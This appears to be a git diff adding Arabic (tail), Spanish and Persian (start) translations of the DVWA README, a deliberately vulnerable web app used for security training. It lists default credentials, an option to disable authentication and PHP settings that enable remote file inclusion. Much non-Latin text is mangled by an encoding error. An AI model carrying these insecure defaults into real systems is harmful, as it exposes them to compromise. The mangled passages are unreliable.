اŲ„ØŖŲ‚Ų„: + +- Ų†Ø¸Ø§Ų… اŲ„ØĒØ´ØēŲŠŲ„ +- ØĸØŽØą 5 ØŖØŗØˇØą Ų…Ų† ØŗØŦŲ„ ØŖØŽØˇØ§ØĄ ؎ادŲ… اŲ„ŲˆŲŠØ¨ Ų…Ø¨Ø§Ø´ØąØŠ بؚد حدŲˆØĢ ØŖŲŠ ØŽØˇØŖ ØĒŲ‚ŲˆŲ… باŲ„ØĨبŲ„اØē ØšŲ†Ų‡ +- ØĨذا ŲƒØ§Ų†ØĒ اŲ„Ų…Ø´ŲƒŲ„ØŠ ØĒØĒØšŲ„Ų‚ بŲ…ØĩادŲ‚ØŠ Ų‚اؚد؊ اŲ„بŲŠØ§Ų†Ø§ØĒ ، ŲØ§Ų†ØĒŲ‚Ų„ ØĨŲ„Ų‰ اŲ„ØŽØˇŲˆØ§ØĒ اŲ„ØŗابŲ‚ØŠ ØŖØšŲ„اŲ‡ ŲˆŲ‚Ų… بØĒØĩŲˆŲŠØą ŲƒŲ„ ØŽØˇŲˆØŠ. ŲˆØŖØąØŗŲ„Ų‡Ø§ Ų…Øš Ų„Ų‚ØˇØŠ شاش؊ Ų„Ų‚ØŗŲ… Ų…Ų„Ų اŲ„ØĒŲƒŲˆŲŠŲ† اŲ„Ø°ŲŠ ŲŠØ¸Ų‡Øą Ų…ØŗØĒ؎دŲ… Ų‚اؚد؊ اŲ„بŲŠØ§Ų†Ø§ØĒ ŲˆŲƒŲ„Ų…ØŠ اŲ„Ų…ØąŲˆØą. +- ŲˆØĩŲ ŲƒØ§Ų…Ų„ Ų„Ų„ØŽØˇØŖ اŲ„Ø°ŲŠ ŲŠØ­Ø¯ØĢ ، ŲˆŲ…ا ØĒØĒŲˆŲ‚Øš حدŲˆØĢŲ‡ ، ŲˆŲ…ا حاŲˆŲ„ØĒ ŲØšŲ„Ų‡ Ų„ØĨØĩŲ„احŲ‡. "ØĒØšØˇŲ„ ØĒØŗØŦŲŠŲ„ اŲ„د؎ŲˆŲ„" Ų„ا ŲŠŲƒŲŲŠ باŲ„Ų†Øŗب؊ Ų„Ų†Ø§ Ų„ŲŲ‡Ų… Ų…Ø´ŲƒŲ„ØĒŲƒ ŲˆØ§Ų„Ų…Øŗاؚد؊ ŲŲŠ Ø­Ų„Ų‡Ø§. + + +- - - + +## Ø­Ų‚Ų† SQL ŲŲŠ SQLite3 + +_ اŲ„دؚŲ… Ų„Ų‡Ø°Ø§ اŲ„ØŖŲ…Øą Ų…حدŲˆØ¯ ، Ų‚بŲ„ ØˇØąØ­ Ų…Ø´ŲƒŲ„ØĒŲƒØŒ ŲŠØąØŦŲ‰ اŲ„ØĒØŖŲƒØ¯ Ų…Ų† اØŗØĒؚدادŲƒ Ų„Ų„ØšŲ…Ų„ ØšŲ„Ų‰ ØĒØĩØ­ŲŠØ­ اŲ„ØŖØŽØˇØ§ØĄ ، ŲˆŲ„ا ØĒŲƒØĒب ببØŗØ§ØˇØŠ "ØŖŲ†Ų‡ Ų„ا ŲŠØšŲ…Ų„" ._ + +بشŲƒŲ„ اŲØĒØąØ§ØļŲŠ ، ŲŠØĒŲ… ØĒŲ†ŲŲŠØ° SQLi Ųˆ Blind SQLi ØšŲ„Ų‰ ؎ادŲ… MariaDB / MySQL اŲ„Ų…ØŗØĒ؎دŲ… ŲŲŠ اŲ„Ų…ŲˆŲ‚Øš ŲˆŲ„ŲƒŲ† Ų…Ų† اŲ„Ų…Ų…ŲƒŲ† اŲ„ØĒبدŲŠŲ„ Ų„ØĨØŦØąØ§ØĄ ا؎ØĒØ¨Ø§Øą SQLi ØšŲ„Ų‰ SQLite3 بدŲ„اŲ‹ Ų…Ų† Ø°Ų„Ųƒ. + +Ų„Ų† Ų†ØĒØˇØąŲ‚ ØĨŲ„Ų‰ ŲƒŲŠŲŲŠØŠ ØĒØ´ØēŲŠŲ„ SQLite3 Ų…Øš PHP ، ŲˆŲ„ŲƒŲ†Ų‡Ø§ Ų…Ų† اŲ„Ų…ŲØĒØąØļ ØŖŲ† ØĒŲƒŲˆŲ† حاŲ„ØŠ بØŗŲŠØˇØŠ ŲˆØ°Ų„Ųƒ بØĒØĢبŲŠØĒ Ø­Ø˛Ų…ØŠ `php-sqlite3` ŲˆØ§Ų„ØĒØŖŲƒØ¯ Ų…Ų† ØĒŲØšŲŠŲ„Ų‡Ø§. + +Ų„ØĨØŦØąØ§ØĄ Ų‡Ø°Ø§ اŲ„ØĒبدŲŠŲ„ ، Ų‚Ų… ببØŗØ§ØˇØŠ بØĒؚدŲŠŲ„ Ų…Ų„Ų اŲ„ØĒŲƒŲˆŲŠŲ† ŲˆØĨØļاŲØŠ ØŖŲˆ ØĒؚدŲŠŲ„ Ų‡Ø°Ų‡ اŲ„ØŖØŗØˇØą: + +``` +$_DVWA["SQLI_DB"] = "sqlite"; +$_DVWA["SQLITE_DB"] = "sqli.db"; +``` + +بشŲƒŲ„ اŲØĒØąØ§ØļŲŠ ، ŲŠØŗØĒ؎دŲ… اŲ„Ų…Ų„Ų `database/sqli.db` ، ØĨذا ØŖحدØĢØĒ ØŽŲ„Ų„ا ŲŲŠŲ‡ØŒ ŲŲ…ا ØšŲ„ŲŠŲƒ ØŗŲˆŲ‰ Ų†ØŗØŽ Ų…Ø­ØĒŲˆŲŠØ§ØĒ Ų…Ų„Ų `database/sqli.db.dist` ŲˆŲ„ØĩŲ‚Ų‡Ø§ ŲŲŠ اŲ„Ų…Ų„Ų اŲ„Ø°ŲŠ ØĒØšŲ…Ų„ ØšŲ„ŲŠŲ‡. + +اŲ„ØĒحدŲŠØ§ØĒ Ų‡ŲŠ Ų†ŲØŗŲ‡Ø§ ØĒŲ…اŲ…Ų‹Ø§ Ų…ØĢŲ„ MySQL ، ŲˆŲ„ŲƒŲ†Ųƒ اŲ„ØĸŲ† ØĒŲ†ŲØ°Ų‡Ø§ ŲŲŠ SQLite3 بدŲ„اŲ‹ Ų…Ų† MySQL. + +- - - + +## ØąŲˆØ§Ø¨Øˇ + +اŲ„ØĩŲØ­ØŠ اŲ„ØąØĻŲŠØŗŲŠØŠ Ų„Ų„Ų…Ø´ØąŲˆØš: + +*ØĒŲ… ØĨŲ†Ø´Ø§Ø¤Ų‡Ø§ بŲˆØ§ØŗØˇØŠ ŲØąŲŠŲ‚DVWA * diff --git a/DVWA/README.es.md b/DVWA/README.es.md new file mode 100644 index 00000000..b1c8be1d --- /dev/null +++ b/DVWA/README.es.md @@ -0,0 +1,428 @@ +# DAMN VULNERABLE WEB APPLICATION + +Damn Vulnerable Web Application (DVWA) es una aplicaciÃŗn web hecha en PHP/MySQL que es extremadamente vulnerable. Su principal objetivo es ayudar a profesionales de seguridad a poner a prueba sus habilidades y herramientas en un entorno legal, ayudar a desarrolladores web a comprender mejor los procesos de asegurar aplicaciones web y ayudar tanto a estudiantes como a profesores a aprender sobre seguridad de aplicaciones web en un entorno de clase controlado. + +El objetivo de DVWA es **practicar algunas de las vulnerabilidades web mÃĄs comunes**, con **varios niveles de dificultad**, con una interfaz sencilla y directa. +Tener en cuenta que hay **tanto vulnerabilidades documentadas como no documentadas** en este software. Esto es intencional. Le animamos a que intente descubrir tantos problemas como sea posible. +- - - + +## ÂĄAVISO! + +ÂĄDamn Vulnerable Web Application es extremadamente vulnerable! **No la suba a la carpeta html pÃēblica de su proveedor de alojamiento ni a ningÃēn servidor expuesto a Internet**, ya que se verÃĄn comprometidos. Se recomienda utilizar una mÃĄquina virtual (como [VirtualBox](https://www.virtualbox.org/) o [VMware](https://www.vmware.com/)), que estÊ configurada en modo de red NAT. Dentro de una mÃĄquina huÊsped, puede descargar e instalar [XAMPP](https://www.apachefriends.org/) para montar el servidor web y la base de datos. + +### Descargo de responsabilidad + +No nos hacemos responsables de la forma en que cualquier persona utilice esta aplicaciÃŗn (DVWA). Hemos dejado claros los propÃŗsitos de la aplicaciÃŗn y no debe usarse de forma malintencionada. Hemos advertido y tomado medidas para evitar que los usuarios instalen DVWA en servidores web activos. Si su servidor web se ve comprometido por una instalaciÃŗn de DVWA, no es responsabilidad nuestra, sino de la persona o personas que lo subieron e instalaron. + +- - - + +## Licencia + +Este archivo es parte de Damn Vulnerable Web Application (DVWA). + +Damn Vulnerable Web Application (DVWA) es software libre: puede redistribuirlo y/o modificarlo bajo los tÊrminos de la Licencia PÃēblica General GNU publicada por la Free Software Foundation, ya sea la versiÃŗn 3 de la Licencia, o (a su elecciÃŗn) cualquier versiÃŗn posterior. + +Damn Vulnerable Web Application (DVWA) se distribuye con la esperanza de que sea Ãētil, pero SIN NINGUNA GARANTÍA; ni siquiera la garantía implícita de +COMERCIABILIDAD o IDONEIDAD PARA UN PROPÓSITO PARTICULAR. Consulte la Licencia PÃēblica General GNU para mÃĄs detalles. + +Debería haber recibido una copia de la Licencia PÃēblica General GNU junto con Damn Vulnerable Web Application (DVWA). Si no es así, consulte . + +- - - + +## InternacionalizaciÃŗn + +Este archivo estÃĄ disponible en varios idiomas: +- Árabe: [اŲ„ØšØąØ¨ŲŠØŠ](README.ar.md) +- Chino: [įŽ€äŊ“中文](README.zh.md) +- EspaÃąol: [EspaÃąol](README.es.md) +- FrancÊs: [Français](README.fr.md) +- Persa: [ŲØ§ØąØŗی](README.fa.md) +- Turco: [TÃŧrkçe](README.tr.md) + +Si desea contribuir con una traducciÃŗn, envíe una PR (Pull Request). Tenga en cuenta, sin embargo, que esto no significa que sÃŗlo tiene que usar Google Translate y enviar el resultado de traducciÃŗn de la herramienta, pues serÃĄ rechazado. Envíe su versiÃŗn traducida aÃąadiendo un nuevo archivo 'README.xx.md' donde xx es el cÃŗdigo de dos letras del idioma deseado (basado en [ISO 639-1](https://en.wikipedia.org/wiki/List_of_ISO_639-1_codes)). + +- - - + +## Descarga + +Aunque existen varias versiones de DVWA, la Ãēnica versiÃŗn con soporte es la Ãēltima del repositorio oficial de GitHub. Usted puede clonarlo desde el repositorio: + +``` +git clone https://github.com/digininja/DVWA.git +``` + +O [descargar un ZIP con todos los archivos](https://github.com/digininja/DVWA/archive/master.zip). + +- - - + +## InstalaciÃŗn + +### Videos de InstalaciÃŗn + +- [Instalando DVWA en Kali corriendo en VirtualBox](https://www.youtube.com/watch?v=WkyDxNJkgQ4) +- [InstalaciÃŗn de DVWA en Windows usando XAMPP](https://youtu.be/Yzksa_WjnY0) +- [InstalaciÃŗn de Damn Vulnerable Web Application (DVWA) en Windows 10](https://www.youtube.com/watch?v=cak2lQvBRAo) + +### Windows + XAMPP + +La forma mÃĄs fÃĄcil de instalar DVWA es descargar e instalar [XAMPP](https://www.apachefriends.org/) si aÃēn no tiene un servidor web configurado. + +XAMPP es una distribuciÃŗn de Apache muy fÃĄcil de instalar para Linux, Solaris, Windows y Mac OS X. El paquete incluye el servidor web Apache, MySQL, PHP, Perl, un servidor FTP y phpMyAdmin. + +Este [video](https://youtu.be/Yzksa_WjnY0) le guiarÃĄ a travÊs del proceso de instalaciÃŗn para Windows, pero debería ser similar para otros sistemas operativos. + +### Archivo de configuraciÃŗn + +DVWA se entrega con una plantilla del archivo de configuraciÃŗn que tendrÃĄ que copiar en su lugar y luego hacer los cambios apropiados. En Linux, suponiendo que se encuentra en el directorio DVWA, esto se puede hacer de la siguiente manera: + +```bash +cp config/config.inc.php.dist config/config.inc.php +``` + +En Windows, esto puede ser un poco mÃĄs difícil si estÃĄ ocultando las extensiones de archivo, si no estÃĄ seguro acerca de esto, esta publicaciÃŗn de blog explica mÃĄs sobre eso: + +[CÃŗmo hacer que Windows muestre las extensiones de archivo](https://www.howtogeek.com/205086/beginner-how-to-make-windows-show-file-extensions/) + +### Paquetes Linux + +Si utiliza una distribuciÃŗn de Linux basada en Debian, necesitarÃĄ instalar los siguientes paquetes _(o sus equivalentes)_: + +- apache2 +- libapache2-mod-php +- mariadb-server +- mariadb-client +- php php-mysqli +- php-gd + +Se recomienda hacer una actualizaciÃŗn antes de esto, sÃŗlo para asegurarse de que va a obtener la Ãēltima versiÃŗn de todos los paquetes. + +``` +apt update +apt install -y apache2 mariadb-server mariadb-client php php-mysqli php-gd libapache2-mod-php +``` + +El sitio funcionarÃĄ con MySQL en lugar de MariaDB, pero recomendamos MariaDB, ya que funciona con su instalaciÃŗn por defecto y sin cambio alguno, mientras que usted tendrÃĄ que hacer cambios para hacer que para MySQL funcione correctamente. + +### ConfiguraciÃŗn de la base de datos + +Para configurar la base de datos, simplemente haga clic en el botÃŗn `Setup DVWA` en el menÃē principal, a continuaciÃŗn, haga clic en el botÃŗn `Create / Reset Database`. Esto crearÃĄ / reiniciarÃĄ la base de datos e insertarÃĄ algunos datos de ejemplo. + +Si recibe un error al intentar crear su base de datos, asegÃērese de que sus credenciales de la base de datos dentro de `./config/config.inc.php` estÃĄn correctamente escritas. *Esto difiere de config.inc.php.dist, que es un archivo de ejemplo.* + +Las variables son las siguientes por defecto: + +```php +$_DVWA[ 'db_server'] = '127.0.0.1'; +$_DVWA[ 'db_port'] = '3306'; +$_DVWA[ 'db_user' ] = 'dvwa'; +$_DVWA[ 'db_password' ] = 'p@ssw0rd'; +$_DVWA[ 'db_database' ] = 'dvwa'; +``` + +Nota, si estÃĄ usando MariaDB en lugar de MySQL (MariaDB viene por defecto en Kali), entonces no podrÃĄ usar el usuario root de la base de datos, por tanto, debe crear un nuevo usuario de base de datos. Para hacer esto, debe conectarse a la base de datos como usuario root y usar los siguientes comandos: + +```mysql +mysql> create database dvwa; +Query OK, 1 row affected (0.00 sec) + +mysql> create user dvwa@localhost identified by 'p@ssw0rd'; +Query OK, 0 rows affected (0.01 sec) + +mysql> grant all on dvwa.* to dvwa@localhost; +Query OK, 0 rows affected (0.01 sec) + +mysql> flush privileges; +Query OK, 0 rows affected (0.00 sec) +``` + +### Desactivar AutenticaciÃŗn + +Algunas herramientas no funcionan bien con mecanismos de autenticaciÃŗn, por lo que no se pueden utilizar con DVWA si la autenticaciÃŗn estÃĄ habilitada. Para resolver esto, existe una opciÃŗn de configuraciÃŗn para desactivar la verificaciÃŗn de autenticaciÃŗn. Para ello, simplemente establezca lo siguiente en el archivo de configuraciÃŗn: + +```php +$_DVWA[ 'disable_authentication' ] = true; +``` + +TambiÊn tendrÃĄ que establecer el nivel de seguridad a uno que sea apropiado para las pruebas que desea hacer: + +```php +$_DVWA[ 'default_security_level' ] = 'low'; +``` + +En este estado, puede acceder a todas las funciones sin necesidad de iniciar sesiÃŗn y tampoco tener que configurar cookies. + +### Otras Configuraciones + +Dependiendo de su sistema operativo, así como la versiÃŗn de PHP, es posible que desee modificar la configuraciÃŗn por defecto. La ubicaciÃŗn de los archivos serÃĄ diferente para cada mÃĄquina. + +**Permisos de carpeta**: + +* `./hackable/uploads/` - El servicio web necesita tener permisos de escritura en esta carpeta (para la subida de archivos). +* `./external/phpids/0.6/lib/IDS/tmp/phpids_log.txt` - El servicio web necesita tener permisos de escritura en esta carpeta (si desea usar PHPIDS). + +**ConfiguraciÃŗn de PHP**: +* Para permitir la inclusiÃŗn remota de archivos (RFI): + * `allow_url_include = on` [[allow_url_include](https://secure.php.net/manual/en/filesystem.configuration.php#ini.allow-url-include)] + * `allow_url_fopen = on` [[allow_url_fopen](https://secure.php.net/manual/en/filesystem.configuration.php#ini.allow-url-fopen)] +* Para reducir opcionalmente la verbosidad ocultando los mensajes de advertencia de PHP: + * `display_errors = off` [[display_errors](https://secure.php.net/manual/en/errorfunc.configuration.php#ini.display-errors)] + +**Archivo: `config/config.inc.php`**: + +* `$_DVWA[ 'recaptcha_public_key' ]` & `$_DVWA[ 'recaptcha_private_key' ]` - Estos valores deben ser generados desde: https://www.google.com/recaptcha/admin/create + +### Credenciales por defecto + +**Nombre de usuario por defecto = `admin`** + +**ContraseÃąa por defecto = `password`** + +_...puede ser fÃĄcilmente crackeada con fuerza bruta ;)_ + +URL de Acceso: http://127.0.0.1/login.php + +Nota: La URL de acceso serÃĄ diferente si ha instalado DVWA en un directorio distinto. + +- - - + +## Contenedor Docker + +Esta secciÃŗn del readme ha sido aÃąadida por @thegrims, para soporte en temas Docker, por favor contactar con Êl o con @opsxcq que es quien mantiene la imagen Docker y el repositorio. Cualquier ticket de incidencia serÃĄ probablemente referenciado a esto y cerrado. + +- [PÃĄgina DockerHub](https://hub.docker.com/r/vulnerables/web-dvwa/) +`docker run --rm -it -p 80:80 vulnerables/web-dvwa` + +Por favor, asegÃērese de que estÃĄ utilizando aufs debido a problemas anteriores con MySQL. Ejecute `docker info` para comprobar su controlador de almacenamiento. Si no es aufs, por favor cÃĄmbielo. Hay guías para cada sistema operativo sobre cÃŗmo hacerlo, pero son bastante diferentes por lo que no lo cubriremos aquí. + +- - - + +## SoluciÃŗn de problemas + +Esta secciÃŗn supone que estÃĄ usando una distribuciÃŗn basada en Debian, como Debian, Ubuntu y Kali. Para otras distribuciones, siga el mismo procedimiento, pero actualice el comando donde corresponda. + +### He navegado hasta el sitio web y he obtenido un Error 404 + +Si estÃĄ teniendo este problema, necesita entender la ubicaciÃŗn correcta de los archivos. Por defecto, el directorio raíz de los documentos de Apache (el lugar donde empieza a buscar contenido web) es `/var/www/html`. Si coloca el archivo `hello.txt` en este directorio, para acceder a Êl deberÃĄ navegar a `http://localhost/hello.txt`. + +Si crea un directorio y pone el archivo allí - `/var/www/html/mydir/hello.txt` - tendrÃĄ que navegar a `http://localhost/mydir/hello.txt`. + +Linux distingue por defecto entre mayÃēsculas y minÃēsculas, por lo que en el ejemplo anterior, si intentara navegar a cualquiera de estos sitios, obtendría un mensaje `404 Not Found`: + +- http://localhost/MyDir/hello.txt +- http://localhost/mydir/Hello.txt +- http://localhost/MYDIR/hello.txt + +ÂŋCÃŗmo afecta esto al DVWA? La mayoría de la gente utiliza git para obtener el DVWA en `/var/www/html`, esto les da el directorio `/var/www/html/DVWA/` con todos los archivos DVWA dentro de Êl. Entonces navegan a `http://localhost/` y obtienen un `404` o la pÃĄgina de bienvenida por defecto de Apache. Como los archivos estÃĄn en DVWA, debe navegar a `http://localhost/DVWA`. + +Otro error comÃēn es navegar a `http://localhost/dvwa` que darÃĄ un `404` porque `dvwa` no es `DVWA` en lo que se refiere a la correspondencia de directorios de Linux. + +Así que despuÊs de la instalaciÃŗn, si intenta visitar el sitio y obtiene un `404`, piense dÃŗnde instalÃŗ los archivos, dÃŗnde estÃĄn en relaciÃŗn con el directorio raíz de documentos, y recuerde si utilizÃŗ mayÃēsculas o minÃēsculas en ese directorio. + +### "Access denied" ejecutando setup + +Si ve lo siguiente al ejecutar el script de instalaciÃŗn significa que el nombre de usuario o la contraseÃąa en el archivo de configuraciÃŗn no coinciden con los configurados en la base de datos: + +``` +Database Error #1045: Access denied for user 'notdvwa'@'localhost' (using password: YES). +``` + +El error le estÃĄ diciendo que estÃĄ usando el nombre de usuario `notdvwa`. + +El siguiente error indica que en el archivo de configuraciÃŗn ha escrito un nombre de base de datos equivocado. + +``` +SQL: Access denied for user 'dvwa'@'localhost' to database 'notdvwa' +``` + +EstÃĄ diciendo que estÃĄ usando el usuario `dvwa` y tratando de conectarte a la base de datos `notdvwa`. + +Lo primero que hay que hacer es comprobar que lo que se cree que ha puesto en el fichero de configuraciÃŗn es realmente lo que estÃĄ ahí. + +Si coincide con lo que se espera, lo siguiente es comprobar que se puede iniciar sesiÃŗn como el usuario en cuestiÃŗn a travÊs de la línea de comandos. Asumiendo que tiene un usuario de base de datos `dvwa` y una contraseÃąa `p@ssw0rd`, ejecute el siguiente comando: + +``` +mysql -u dvwa -pp@ssw0rd -D dvwa +``` + +*Nota: No hay espacio despuÊs de -p* + +Si ve lo siguiente, la contraseÃąa es correcta: + +``` +Welcome to the MariaDB monitor. Commands end with ; or \g. +Your MariaDB connection id is 14 +Server version: 10.3.22-MariaDB-0ubuntu0.19.10.1 Ubuntu 19.10 + +Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +MariaDB [dvwa]> +``` + +Como puede conectarse en la línea de comandos, es probable que haya algo mal en el archivo de configuraciÃŗn, compruebe dos veces y luego plantee un Issue si todavía no puede hacer que las cosas funcionen. + +Si ve lo siguiente, el nombre de usuario o la contraseÃąa que estÃĄ utilizando son incorrectos. Repita los pasos de [Database Setup](#database-setup) y asegÃērese de usar el mismo nombre de usuario y contraseÃąa durante todo el proceso. + +``` +ERROR 1045 (28000): Access denied for user 'dvwa'@'localhost' (using password: YES) +``` + +Si obtiene lo siguiente, las credenciales del usuario son correctas pero el usuario no tiene acceso a la base de datos. De nuevo, repita los pasos de configuraciÃŗn y compruebe el nombre de la base de datos que estÃĄ utilizando. + +``` +ERROR 1044 (42000): Access denied for user 'dvwa'@'localhost' to database 'dvwa' +``` + +El Ãēltimo error que puede obtener es el siguiente: + +``` +ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2) +``` + +Esto no es un problema de autenticaciÃŗn, sino que indica que el servidor de base de datos no se estÃĄ ejecutando. Puede iniciar el servidor con lo siguiente: + +```sh +sudo service mysql start +``` + +### MÊtodo de autenticaciÃŗn desconocido + +Con las versiones mÃĄs recientes de MySQL, PHP ya no puede comunicarse con la base de datos en su configuraciÃŗn por defecto. Si intenta ejecutar el script de instalaciÃŗn y obtiene el siguiente mensaje significa que tiene la configuraciÃŗn por defecto. + +``` +Database Error #2054: The server requested authentication method unknown to the client. +``` + +Tiene dos opciones, la mÃĄs fÃĄcil es desinstalar MySQL e instalar MariaDB. La siguiente es la guía oficial del proyecto MariaDB: + + + +Alternativamente, siga estos pasos: + +1. Como root, edite el siguiente archivo `/etc/mysql/mysql.conf.d/mysqld.cnf`. +2. Bajo la línea `[mysqld]`, aÃąada lo siguiente: + `default-authentication-plugin=mysql_native_password`. +3. Reinicie el servidor de base de datos: `sudo service mysql restart` +4. Compruebe el mÊtodo de autenticaciÃŗn del usuario de la base de datos: + + ```sql + mysql> select Host,User, plugin from mysql.user where mysql.user.User = 'dvwa'; + +-----------+------------------+-----------------------+ + | Host | User | plugin | + +-----------+------------------+-----------------------+ + | localhost | dvwa | caching_sha2_password | + +-----------+------------------+-----------------------+ + 1 rows in set (0.00 sec) + ``` + +5. Es probable que vea `caching_sha2_password`. Si es así, ejecute el siguiente comando: + + ```sql + mysql> ALTER USER dvwa@localhost IDENTIFIED WITH mysql_native_password BY 'p@ssw0rd'; + ``` + +6. Al volver a ejecutar la verificaciÃŗn, ahora debería ver `mysql_native_password`. + + ```sql + mysql> select Host,User, plugin from mysql.user where mysql.user.User = 'dvwa'; + +-----------+------+-----------------------+ + | Host | User | plugin | + +-----------+------+-----------------------+ + | localhost | dvwa | mysql_native_password | + +-----------+------+-----------------------+ + 1 row in set (0.00 sec) + ``` + +DespuÊs de todo esto, el proceso de configuraciÃŗn debería funcionar con normalidad. + +Si desea mÃĄs informaciÃŗn consulte la siguiente pÃĄgina: . + +### Database Error #2002: No such file or directory. + +El servidor de base de datos no se estÃĄ ejecutando. En una distro basada en Debian esto se puede hacer con: + +```sh +sudo service mysql start +``` + +### Errores "MySQL server has gone away" y "Packets out of order" + +Hay algunas razones por las que podría estar obteniendo estos errores, pero la mÃĄs probable es que la versiÃŗn del servidor de base de datos que estÃĄ ejecutando no sea compatible con la versiÃŗn de PHP. + +Esto se encuentra de forma mÃĄs comÃēn cuando se estÃĄ ejecutando la Ãēltima versiÃŗn de MySQL y PHP, y estÃĄs no se llevan bien. El mejor consejo, deshÃĄgase de MySQL e instale MariaDB ya que esto no es algo con lo que podamos ayudarte. + +Para mÃĄs informaciÃŗn, vea: + + + +### La InyecciÃŗn de Comandos no funcionarÃĄ + +Es posible que Apache no tenga privilegios suficientes para ejecutar comandos en el servidor web. Si estÃĄ ejecutando DVWA en Linux asegÃērese de que ha iniciado sesiÃŗn como root. Bajo Windows inicie sesiÃŗn como Administrador. + +### ÂŋPor quÊ no se puede conectar la base de datos en CentOS? + +Puede estar teniendo problemas con SELinux. Desactive SELinux o ejecute este comando para permitir que el servidor web se comunique con la base de datos: + +``` +setsebool -P httpd_can_network_connect_db 1 +``` + +### Cualquier otra cosa + +Para obtener la informaciÃŗn mÃĄs reciente sobre soluciÃŗn de problemas, lea los tickets abiertos y cerrados en el repositorio git: + + + +Antes de enviar un ticket, por favor asegÃērese de que estÃĄ ejecutando la Ãēltima versiÃŗn del cÃŗdigo del repositorio. No se trata de la Ãēltima versiÃŗn liberada (released), sino del Ãēltimo cÃŗdigo disponible en la rama master. + +Si desea enviar un ticket, por favor envíe al menos la siguiente informaciÃŗn: + +- Sistema operativo +- Las Ãēltimas 5 líneas del log de errores del servidor web justo despuÊs de que se produzca el error del que estÃĄ informando. +- Si se trata de un problema de autenticaciÃŗn de base de datos, siga los pasos anteriores y haga una captura de pantalla de cada paso. Envíelas junto con una captura de pantalla de la secciÃŗn del archivo de configuraciÃŗn que muestra el usuario y la contraseÃąa de la base de datos. +- Una descripciÃŗn completa de lo que estÃĄ fallando, lo que espera que ocurra y lo que ha intentado hacer para solucionarlo. "inicio de sesiÃŗn roto" no es suficiente para que entendamos su problema y le ayudemos a solucionarlo. + +- - - + +## InyecciÃŗn SQL en SQLite3 + +_El soporte para esto es limitado, antes de abrir tickets en Issues, por favor asegÃērese de que estÃĄ preparado para trabajar en la depuraciÃŗn del problema, no se limite a decir "no funciona"._ + +Por defecto, SQLi y Blind SQLi se hacen contra el servidor MariaDB/MySQL utilizado por el sitio, pero es posible cambiar la configuraciÃŗn para hacer las pruebas SQLi contra SQLite3 en su lugar. + +No se va a cubrir cÃŗmo hacer que SQLite3 funcione con PHP, pero debería ser un simple caso de instalar el paquete `php-sqlite3` y asegurarse de que estÃĄ habilitado. + +Para hacer el cambio, simplemente edite el archivo de configuraciÃŗn y aÃąada o edite estas líneas: + +``` +$_DVWA["SQLI_DB"] = "sqlite"; +$_DVWA["SQLITE_DB"] = "sqli.db"; +``` + +Por defecto se utiliza el fichero `database/sqli.db`, si lo estropea al archivo por error, simplemente copiar el archivo `database/sqli.db.dist` y sobreescribir el existente estropeado. + +Los retos son exactamente los mismos que para MySQL, sÃŗlo que se ejecutan contra SQLite3 en su lugar. + +- - - + +👨‍đŸ’ģ Contribuyentes +----- + +Gracias por todas sus contribuciones y por mantener este proyecto actualizado. :heart: + +Si tienes una idea, algÃēn tipo de mejora o simplemente quieres colaborar, eres bienvenido de contribuir y participar en el proyecto, siÊntete libre de enviar tu PR. + +

+ + + +

+ +- - - + +## Enlaces + +Inicio del proyecto: + +*Creado por el Equipo de DVWA* diff --git a/DVWA/README.fa.md b/DVWA/README.fa.md new file mode 100644 index 00000000..7da8c07e --- /dev/null +++ b/DVWA/README.fa.md @@ -0,0 +1,390 @@ +# اŲžŲ„یڊیشŲ† ŲˆØ¨ÛŒ ŲˆØ­Ø´ØĒŲ†Ø§ÚŠ ØĸØŗیب‌ŲžØ°ÛŒØą +اŲžŲ„یڊیشŲ† ŲˆØ¨ÛŒ ŲˆØ­Ø´ØĒŲ†Ø§ÚŠ ØĸØŗیب‌ŲžØ°ÛŒØą (DVWA)، یڊ اŲžŲ„یڊیشŲ† ŲˆØ¨ÛŒ Ų…بØĒŲ†ÛŒ Ø¨Øą ŲžÛŒâ€ŒØ§Ú†â€ŒŲžÛŒ/Ų…ای‌اØŗÚŠÛŒŲˆØ§Ų„ اØŗØĒ ÚŠŲ‡ بŲ‡ شدØĒ ØĸØŗیب‌ŲžØ°ÛŒØą ØˇØąØ§Ø­ÛŒ شدŲ‡ اØŗØĒ. اŲ‡Ø¯Ø§Ų اØĩŲ„ÛŒ ØĸŲ† ÛŒØ§ØąÛŒ ØąØŗاŲ†Ø¯Ų† بŲ‡ Ų…ØĒØŽØĩØĩیŲ† Ø­ŲˆØ˛Ų‡Ų” اŲ…Ų†ÛŒØĒ Ø¨ØąØ§ÛŒ Ų…Ø­ÚŠâ€ŒØ˛Ø¯Ų† Ų…Ų‡Ø§ØąØĒ‌Ų‡Ø§ Ųˆ Ø§Ø¨Ø˛Ø§ØąŲ‡Ø§ÛŒØ´Ø§Ų† Ø¯Øą Ų…Ø­ÛŒØˇÛŒ Ų‚اŲ†ŲˆŲ†ÛŒØŒ ÚŠŲ…ÚŠ ÚŠØąØ¯Ų† بŲ‡ ØĒŲˆØŗØšŲ‡â€ŒØ¯Ų‡Ų†Ú¯Ø§Ų† Ø¨ØąØ§ Ø¯ØąÚŠ بŲ‡ØĒØą ŲØąØ§ÛŒŲ†Ø¯ ایŲ…Ų†â€ŒØŗØ§Ø˛ÛŒ اŲžŲ„یڊیشŲ†â€ŒŲ‡Ø§ÛŒ ŲˆØ¨ÛŒ Ųˆ Ų‡Ų…Ú†Ų†ÛŒŲ† ÚŠŲ…ÚŠ ÚŠØąØ¯Ų† بŲ‡ Ų…Ø¯ØąØŗیŲ† Ųˆ داŲ†Ø´ØŦŲˆÛŒØ§Ų† Ø¨ØąØ§ÛŒ ÛŒØ§Ø¯Ú¯ÛŒØąÛŒ اŲ…Ų†ÛŒØŗØĒ اŲžŲ„یڊیشŲ† ŲˆØ¨ÛŒ Ø¯Øą Ų…Ø­ÛŒØˇ ÚŠŲ†ØĒØąŲ„‌شدŲ‡Ų” ÚŠŲ„اØŗی ØąØ§ شاŲ…Ų„ Ų…ی‌شŲˆØ¯. + +Ų‡Ø¯Ų DVWA، **ØĒŲ…ØąÛŒŲ† ب؎شی Ø§Ø˛ Ų…ØĒداŲˆŲ„‌ØĒØąÛŒŲ† Ų†ŲŲˆØ°ŲžØ°ÛŒØąÛŒâ€ŒŲ‡Ø§ÛŒ ŲˆØ¨ÛŒ**، Ø¯Øą **ØŗØˇØ­â€ŒŲ‡Ø§ÛŒ Ų…ØĒŲØ§ŲˆØĒی Ø§Ø˛ 